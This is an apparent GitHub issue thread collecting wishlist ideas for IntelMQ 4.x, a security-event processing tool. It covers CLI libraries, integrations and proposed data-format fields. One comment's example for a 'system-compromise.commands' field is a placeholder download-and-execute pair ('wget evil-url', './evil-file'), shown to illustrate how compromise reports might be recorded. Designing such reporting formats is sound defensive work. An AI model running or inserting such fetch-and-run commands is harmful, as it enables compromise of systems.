intelmq icon indicating copy to clipboard operation
intelmq copied to clipboard

Published 20 hours ago verified publisher icon certtools

Wishlist for IntelMQ 4.x

Open aaronkaplan opened this issue 2 years ago • 7 comments

  • [ ] all CLI components could highly benefit from using typer
  • [ ] support redis streams
  • [ ] LDAP enrichment bot (which must also be compatible with AD)
  • [ ] Full Splunk support: interface the Splunk API
  • [ ] VT API enrichtment bot
  • [ ] Support Jira as ticket system
  • [ ] Support OTRS as ticket system
  • [ ] TheHive interface
  • [ ] new data format (see IEP04)

aaronkaplan avatar Aug 26 '21 08:08 aaronkaplan

For potential new hard requirements in the core I usually look at how widespread and common that dependency is. For typer, I see that it's available in Debian sid and Fedora and openSUSE Tumbleweed. So it doesn't look like the package is bleeding edge and is starting to be picked up by distros. For the older ones, we'd still to package it ourselves. To put it in a nutshell, from that point of view, that's not a blocker.

ghost avatar Aug 26 '21 09:08 ghost

okay, but it should not be a big problem to bring it and package it for bullseye for example. So, yeah... not a blocker. The question is - did you read the docs and would it make sense ? It looks really good for me, make the code very clean and lean and simple.

aaronkaplan avatar Sep 01 '21 20:09 aaronkaplan

It also supports shell completion (https://typer.tiangolo.com/typer-cli/), which is a big pro (our current solutions some some issues, e.g. #1240 #1561 #2094 ). Still, before going for typer I'd like to see a comparison of different solution to check if it matches our requirements best (could even also be an IEP). E.g. one other (even more) widespread cli-library is click.

ghost avatar Sep 03 '21 07:09 ghost

+1 for IEP. But I am collecting ideas first in this issue :)

aaronkaplan avatar Sep 05 '21 23:09 aaronkaplan

maybe it makes sense to first define the problem(s) that should be solved

ghost avatar Sep 07 '21 08:09 ghost

Extending format based on classification.type.

Example 1: classification.type: "phishing"

Optional additional fields: phishing.brand: "Big-Bank-Name" phishing.screenshot (maybe base64 data?) phishing.sector: "banking" phishing.language: EN etc

Example 2: classification.type: "system-compromise"

Optional additional fields: system-compromise.commands: ["wget evil-url", "./evil-file"] system-compromise.vector: "ssh" (or maybe "web-attacks", "sqli", etc) etc.

Add destination.password

When an event describes unauthorized login attempt, it would be nice to officialy "recognize" the password (for example honeypots provide this information).

Add TLS info

If some service is running using TLS, we could accomodate info about certificate serial number or perhaps an issuer of the cert.

All of the above are half-baked ideas, but they come from real experience when I found it really hard/impossible to map relevant information to the intelmq data format without adding custom fields.

gethvi avatar Apr 21 '22 20:04 gethvi

@gethvi good additions, thanks! Agree, they could be elaborated but this list is there to collect ideas :) so, spot on. No idea is too half-baked for this issue :)

aaronkaplan avatar Apr 26 '22 09:04 aaronkaplan